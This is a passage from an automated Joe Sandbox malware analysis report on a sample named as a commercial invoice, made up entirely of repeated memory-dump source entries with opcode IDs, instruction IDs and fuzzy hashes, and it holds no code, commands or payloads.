                                              • Instruction Fuzzy Hash: 7A41B670B1CA094FE758AE1C94522B9B7D2EF99770F54017EE44A83293DE64A82283D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2cb2b1cfc264d0a4b6e936d77f66deab83afbf7fb8de07cfedb84eea26b5b278
                                              • Instruction ID: 15108325ea56d87699f31e1e552a8fd1a3794ed125db1f723dca01d159b2e571
                                              • Opcode Fuzzy Hash: 2cb2b1cfc264d0a4b6e936d77f66deab83afbf7fb8de07cfedb84eea26b5b278
                                              • Instruction Fuzzy Hash: 0B41C13161CE0A8FEB64EF18C4906A6F3E2FF98364B54067AD44AC3655DE24F8168B90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce203a79013f222a4314e28cfac48d72b92c6346d1cb458b97c44697530c0dab
• Instruction ID: 1547d22c27467337a6ebc7c8382b1e0396b8945588990e00026569779d01fa5b
• Opcode Fuzzy Hash: ce203a79013f222a4314e28cfac48d72b92c6346d1cb458b97c44697530c0dab
• Instruction Fuzzy Hash: 4A51C361A0D7C54FD7479B3C58652A0BFE1EF5B220B8A41FBC089CB2A3D9686C178361
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 073061f9e3e321263200e85f00fadedb73c91750549ac31a83910e9a25b3d4e1
• Instruction ID: cbb0d5ba2c5145c407bcab8567ab81d9113086242abd41fa41f17c6ad540e288
• Opcode Fuzzy Hash: 073061f9e3e321263200e85f00fadedb73c91750549ac31a83910e9a25b3d4e1
• Instruction Fuzzy Hash: DA41F5B161999A5FC708FB2DA8956E6F3A0FF4536934443BBC04EC7283DE24B41687C0
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1ea07a0e3804f913736ba4894574c50444bf88aaba248f95c98875c668d07a7e
• Instruction ID: cc127716fa5a26c79ede7fda436401a5d679e54a965b58bb8f552a2fcab23c8f
• Opcode Fuzzy Hash: 1ea07a0e3804f913736ba4894574c50444bf88aaba248f95c98875c668d07a7e
• Instruction Fuzzy Hash: FA51AF3190CF854FE764DB28C094B66F7D1FF49328F484BB8D48EC7591D6A8A899C390
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 998826e3bf945c7affb6ebea984a918a3311443b1dbf6e6554ea0ef5a67bd285
• Instruction ID: cddaa79dd43072e7f0faaa7de33b2a82669c79cdffeada13566ee12868567d38
• Opcode Fuzzy Hash: 998826e3bf945c7affb6ebea984a918a3311443b1dbf6e6554ea0ef5a67bd285
• Instruction Fuzzy Hash: 8241C731B1C9054FE759BA2CA4556BEB7D2EF89371B14027FE04ED3293DE2898424781
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e19126f142e61cd310cabfec19abb8e4cfaee6608c12a1a851b591d48ee7df4
• Instruction ID: 92faec6a474f51ad92f8b29a7dcc6bfd5a9f10ceb477a435aa5d9e4e8c4f98e0
• Opcode Fuzzy Hash: 8e19126f142e61cd310cabfec19abb8e4cfaee6608c12a1a851b591d48ee7df4
• Instruction Fuzzy Hash: C1416671A0D9160BEB18AA68A4A62FEB3D1EF46B70B98117DD48E871C2DD586C5343A0
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be8f06948b03904432062625ba87aff4e960805525851b1025b337496b30b683
• Instruction ID: b362c0aefc5a5706af8058e930079c5cc89e05fda6cffaa5072605b287366206
• Opcode Fuzzy Hash: be8f06948b03904432062625ba87aff4e960805525851b1025b337496b30b683
• Instruction Fuzzy Hash: 8E412771A0DA498FDB45DF2CC8556EDBBE1FF89320B4801AAD049D3293CA24AC12C7E1
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69400b42f3503c37fef9019c0d2c23fd4c4240e50ce73fb16d827bdfaf705c91
• Instruction ID: 6212e3f12c88e64a1d4ce6ca5204f996df84c1f5c6a07c7a6475e43f87ca52c6
• Opcode Fuzzy Hash: 69400b42f3503c37fef9019c0d2c23fd4c4240e50ce73fb16d827bdfaf705c91
• Instruction Fuzzy Hash: 7B415670A0D9160FEB18AA6894A62BEB7D1EF46B30BD8117DD48E871C5DD586C5383A0
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbb3e5caacdb59c7d6aa9ada185617711681ba274ffddf065f0f3209b0ae8a12
• Instruction ID: 52c94c9ad3c27aacf36dc0cb740647799a93e2c911fb4573c849574a47833818
• Opcode Fuzzy Hash: bbb3e5caacdb59c7d6aa9ada185617711681ba274ffddf065f0f3209b0ae8a12
• Instruction Fuzzy Hash: 5931D43170DD094FE798FA2CA8197B9B7D1EF8A371B4402BAD44EC3293CD65B8528380
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36cb5b1878a8673b4a7ce8dfd59ae5571667c8ff06bd9e3c24e3d36a0dec5d4a
• Instruction ID: e252dcf04f320d015f5ea8672d8b6864cbefe2b662df79fb4ce31bb181fb9d10
• Opcode Fuzzy Hash: 36cb5b1878a8673b4a7ce8dfd59ae5571667c8ff06bd9e3c24e3d36a0dec5d4a
• Instruction Fuzzy Hash: E431B231B1CD094FE759BA2C94566BEB6E2FF88371B54027EE04ED3293DE2898424781
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e9576c52ce31386acc02429a9f01b290d4275e082cce7758a5c16f9115d16ed
• Instruction ID: cd57b45fb0e53f39c448ddc182d178ada90befa08d728f0b5c479a5f69be0765
• Opcode Fuzzy Hash: 1e9576c52ce31386acc02429a9f01b290d4275e082cce7758a5c16f9115d16ed
• Instruction Fuzzy Hash: A941923060CA188FDB48FF19D4419B9B7E1EF98330B94017DE44A832A2CE64F852CB95
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f87ded0c1e04c87c76304f5f8e42fad3dd53cbea424cc7ff4d41b77e13601d9
• Instruction ID: 00c33c76c16e06cf6ef3af70aaafb62e279e12357f943b1308c8f934daad9aa7
• Opcode Fuzzy Hash: 5f87ded0c1e04c87c76304f5f8e42fad3dd53cbea424cc7ff4d41b77e13601d9
• Instruction Fuzzy Hash: 5B311331A0CA514FE70CB76CA8866EAF7D0EF99365F44417FE08E82287CD64B8428385
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b0a0a955448d6fd605b75d6d241c5cebd45ea6682e0a05977a8fc81e98f1997
• Instruction ID: 876d419b1b3f3b67d2d0b079a7db9578785f83c51bb4e9bed27e1acca135b323
• Opcode Fuzzy Hash: 5b0a0a955448d6fd605b75d6d241c5cebd45ea6682e0a05977a8fc81e98f1997
• Instruction Fuzzy Hash: 6B319321B4DC1A0BEB84F65CB8916B8F2D2EF88371B944276D40DC338ADD69B85643A1
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32ff05c32711679ef25e3538722717c65195ab27f7709ed40dbce8bd004b1cd7
• Instruction ID: 968974300b95b4982b5fff89197e1677b8eb597a441e84fe9807e7eb98bc8bd3
• Opcode Fuzzy Hash: 32ff05c32711679ef25e3538722717c65195ab27f7709ed40dbce8bd004b1cd7
• Instruction Fuzzy Hash: 15417F30A1CE068BEB64EF199454A62F7E2FF59320B844639D48AC3691DF64F891C750
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62352ca6c16c07f2f24a81a11404190e06e7ae94fbc789aec2b945e87eb6c65e
• Instruction ID: 4d4d91dc762e39f53b198e9b27d7b7649a02e7f03174c578497def5d1e32fb5d
• Opcode Fuzzy Hash: 62352ca6c16c07f2f24a81a11404190e06e7ae94fbc789aec2b945e87eb6c65e
• Instruction Fuzzy Hash: 89311771A0C9498FDB44DF2C8855AEDFBE1FF89360B4401BAD049E3292CA25AC11C7A1
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee9b1e2623e2377b61b5974c074f7dcb70d14cb68e64350ad764f1634d755d1f
• Instruction ID: 4dc6cf25988bb0113856f6706749fae0e2ca6a6e82a8b690b14efa05f0cff48c
• Opcode Fuzzy Hash: ee9b1e2623e2377b61b5974c074f7dcb70d14cb68e64350ad764f1634d755d1f
• Instruction Fuzzy Hash: 89314772A0D7520BE305B76C78A53E5BBD0EF4237AF0842BBD58CC6183ED58B8458394
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d683eddb3f0c754ab1bfbbd5c15240995fb4cd1f3e16ddc906e4b6718c321f5
• Instruction ID: e83ff11420dcf1942f14d5635ef0fdeee284806781bdf8143cdc7f9afe7a703a
• Opcode Fuzzy Hash: 5d683eddb3f0c754ab1bfbbd5c15240995fb4cd1f3e16ddc906e4b6718c321f5
• Instruction Fuzzy Hash: 1931D470A1DE864FC75DAB2998915A6B7A1FF5832030442BFD05FC36D7CE24B84AC781
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0a6e43146293da67e5922e468fb42c8e5438a6992e1999882231176603790559
• Instruction ID: 04dd5b68d0d8ae552e731af7c4aaa4ddb3a3322d3d1043e20943817ab098ebcd
• Opcode Fuzzy Hash: 0a6e43146293da67e5922e468fb42c8e5438a6992e1999882231176603790559
• Instruction Fuzzy Hash: 6D31386050E7869FD742AB7448222F8FFE1BF0233078941FAD149CB1D3DA5D2956C791
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 198b0448f8a2de18975495888600e6f492b19a699e1411c3700f5aa69c8eaf7e
• Instruction ID: 5ee49e57896e2e064a2673eb5c5bf2529255003217a9fd854370305c9e13c229
• Opcode Fuzzy Hash: 198b0448f8a2de18975495888600e6f492b19a699e1411c3700f5aa69c8eaf7e
• Instruction Fuzzy Hash: 84316B3061CE0A8FDBA4EF1DD484A62B3E1FF68320B904179D44EC3656DE64FC518B80
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1fb29e960d21864af0efaa1e6d43b56bae8d781fd6c41c98c2da7de66cd0415d
• Instruction ID: ca943e35d4879c23a307e6f65c2a681ad5560c14039d247fece860e3288ee744
• Opcode Fuzzy Hash: 1fb29e960d21864af0efaa1e6d43b56bae8d781fd6c41c98c2da7de66cd0415d
• Instruction Fuzzy Hash: 4821F071A1C9494FDF4CAA189886AF973D1EFA9350F00006EF84F83287DE34B8478385
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: daa490f4d8bfb7207acd95c6e8b3790ca037ff562893852cd861eba389062300
• Instruction ID: 91822049b35f8a37a30a8132073caf4cbc16c0f9e9cad05268a98d8b9f8276fe
• Opcode Fuzzy Hash: daa490f4d8bfb7207acd95c6e8b3790ca037ff562893852cd861eba389062300
• Instruction Fuzzy Hash: 3121623071CD084FD798EA1DD449A75B7E1FBA9321B50026EE44EC36A6DE61FC568780
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: daa1bf1ab8207dc34ba4963e6949a032e203bde2047321d6165fd3fc36af1ca7
• Instruction ID: 836f122766137fb4c1becfc3fc5a7b89a3db7768a3606c850c362c5a4da71e4e
• Opcode Fuzzy Hash: daa1bf1ab8207dc34ba4963e6949a032e203bde2047321d6165fd3fc36af1ca7
• Instruction Fuzzy Hash: ED21A520B1CD074FFBA8AE5D6855775A3C3EF983B1B9441B6E40DC3295CD59EC5382A0
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de613e1b123471d18fa184742ef5fd118b380b0dcd82db5556d215128c6a2c18
• Instruction ID: 259341bb82e2661359e42e83a5c1edd8d629558eb9395aabe10d8932d74cc466
• Opcode Fuzzy Hash: de613e1b123471d18fa184742ef5fd118b380b0dcd82db5556d215128c6a2c18
• Instruction Fuzzy Hash: 8D31F53060F6469FD786AB3884922B4B7E1FF453307D901F9C10ACB596DA6D6C628791
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7bb0320332431c4181ed4c21074b459017d5505640eecb885d99309c66300f49
• Instruction ID: bdadd60f9c531836b30259ca269dc273ac9bebcb0025ebdc0b0ec90b45b0db30
• Opcode Fuzzy Hash: 7bb0320332431c4181ed4c21074b459017d5505640eecb885d99309c66300f49
• Instruction Fuzzy Hash: 0431396050F78A9FD741AB7848222B8FBE1BF06360B8941F9C149CB1D3DE6D2C15C791
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d3932b30e30d174d00c56bc3079b22402c7ea8e679eec30b9b6f010b112088f
• Instruction ID: 65a4f34e04d6cd0aa445ecdc22d647c0b0299c6358a5cd91295fbee4c527afd9
• Opcode Fuzzy Hash: 1d3932b30e30d174d00c56bc3079b22402c7ea8e679eec30b9b6f010b112088f
• Instruction Fuzzy Hash: 9521A16071CD098FDBA8AA5D5454776F3D1FF59334B8005BAD00EC3691CE65A8228790
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cff8fe4cca08f13ca588c5bb475019a79cb05e68171196ae8a7e2dccf52840e5
• Instruction ID: 74d769781dead35477e20d8046cc2c8348ccbebac64737119f621b014d30847b
• Opcode Fuzzy Hash: cff8fe4cca08f13ca588c5bb475019a79cb05e68171196ae8a7e2dccf52840e5
• Instruction Fuzzy Hash: 3121AF70A0C90A8FD798FA18D494AA6F3E1FF98325F94477AD44DC3245DE39E9528780
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2f7ddc86a55ba387680f9c3c17617da705e41c0cc1aea0433733c897a426a8e
• Instruction ID: 1a8d65b04ab5b2ef934746b6ce054976be095060123870bab5634e79df392aea
• Opcode Fuzzy Hash: b2f7ddc86a55ba387680f9c3c17617da705e41c0cc1aea0433733c897a426a8e
• Instruction Fuzzy Hash: 1D215E71B28D0A8FDB5CEB2980546B5F3E2FFA9315754476E800BC3696DE35E5068780
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61d9226807ce1242a80886d479f70ff40d023a859e079631a7638d17c712e893
• Instruction ID: 8443cbb7ca7b3f5056bff45e9ccc61bd14e431a9e61d3954ec008a49e3bdd171
• Opcode Fuzzy Hash: 61d9226807ce1242a80886d479f70ff40d023a859e079631a7638d17c712e893
• Instruction Fuzzy Hash: 6321D82140E7C65FD747A77448216A5BFF1AF83220B8D41FAD089CB193DE1CA926C361
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 694e092b28087978a6d648c616826654595d103df2943701b272aa37087657bd
• Instruction ID: a4ef04b8df4f2b89a12a2cc9d6465e80dd403ad36ac663acad39af3c88623bb3
• Opcode Fuzzy Hash: 694e092b28087978a6d648c616826654595d103df2943701b272aa37087657bd
• Instruction Fuzzy Hash: F2119D22E2DD1A4BAB2CBA1CA4511B9B3D2EF5833179442BAD41EC3287DD68B85642C5
Memory Dump Source
• Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb643423d092b8b622b736234e371ca7ecdf501706d75ec09fdaa2e6009d7c94
• Instruction ID: 5f1ac04c7e6238b2db7689c4db267d9a7df2061d6864585300f7e3c846ebab07
• Opcode Fuzzy Hash: eb643423d092b8b622b736234e371ca7ecdf501706d75ec09fdaa2e6009d7c94
• Instruction Fuzzy Hash: 5F21033150898D8FDB49EF28C8545B9B7E1FFA9348B5546BAD00BC7195CE31F841C780
Memory Dump Source
• Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                              • Opcode ID: 7f496ce2197cf3d2e687033d036847b4099a268f2c25a2bbe4f2f6e345a03877
                                              • Instruction ID: bd5a691fbea941b0685ec60e23da3c0d710431df253835dec63387410818c356
                                              • Opcode Fuzzy Hash: 7f496ce2197cf3d2e687033d036847b4099a268f2c25a2bbe4f2f6e345a03877
                                              • Instruction Fuzzy Hash: FF21E720A1DD4A4FD799FB2C84556A5B7E1FFD6360BD802B9D04DC7286DE6CE8228350
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 66997e7997f2518a1698cbf713b48489c2c6caa70edf6cc6d2148b7c1f05dcf9
                                              • Instruction ID: 388462816bf79580fd3e76ff9534a1ecf72aef308b6a4379c2bd13b26e63f48a
                                              • Opcode Fuzzy Hash: 66997e7997f2518a1698cbf713b48489c2c6caa70edf6cc6d2148b7c1f05dcf9
                                              • Instruction Fuzzy Hash: 6211CE21A1DE4A4BD758AB2868551A9B3D1EF8873039402BEC44EC3287DE68B8568685
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4812b20162c3db9ff6965395070bf79a7bdda084d4cc7991f0805a31d2d7565f
                                              • Instruction ID: 3f8d4609cdafc647a0e39059c1edb7cd2ed91a42ee6a3945147c236c37abee7a
                                              • Opcode Fuzzy Hash: 4812b20162c3db9ff6965395070bf79a7bdda084d4cc7991f0805a31d2d7565f
                                              • Instruction Fuzzy Hash: EA11A33104E7C99FC7169F748825594BFF0FE47320B4981EED0988B093E758652EC752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baa9f4230321d6727750a1f7b80059c47b6695290c7ea4e75ff322ef29a19fcb
                                              • Instruction ID: eda18c84feea3c137aff7719de878c59cd987e6e2ee0a3742893033b65deca75
                                              • Opcode Fuzzy Hash: baa9f4230321d6727750a1f7b80059c47b6695290c7ea4e75ff322ef29a19fcb
                                              • Instruction Fuzzy Hash: A4012D3170D7858FD75AAB2C68551B07BD1EF9B23035401FBD049CB1A7DD596C178361
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c65456629026e3123746b43f9e138c69177bca9be2e7014e9885bc545e6f02f
                                              • Instruction ID: 9b44b0ff7bfe69d4ad77ebd34adcf9c2f91bf090bd54b43043879751f1456239
                                              • Opcode Fuzzy Hash: 5c65456629026e3123746b43f9e138c69177bca9be2e7014e9885bc545e6f02f
                                              • Instruction Fuzzy Hash: 4001CC21B1CD1A0B9B6DBA1CA0811B9F3C2EF8873079446BED41FC338ADD68B8524285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93aa787128c80c895e314022939f38fa7b3b0238023a8b69085a0c6bdbd21ca2
                                              • Instruction ID: 882adc6b427e71abd48221cee0aa2d0cea6d1a7852ff3efb6d4b0927352b3c6a
                                              • Opcode Fuzzy Hash: 93aa787128c80c895e314022939f38fa7b3b0238023a8b69085a0c6bdbd21ca2
                                              • Instruction Fuzzy Hash: F611D02061DA8A9FD704AB288451765F3E1FF59314F9443B9C00A87693CE38B8128780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
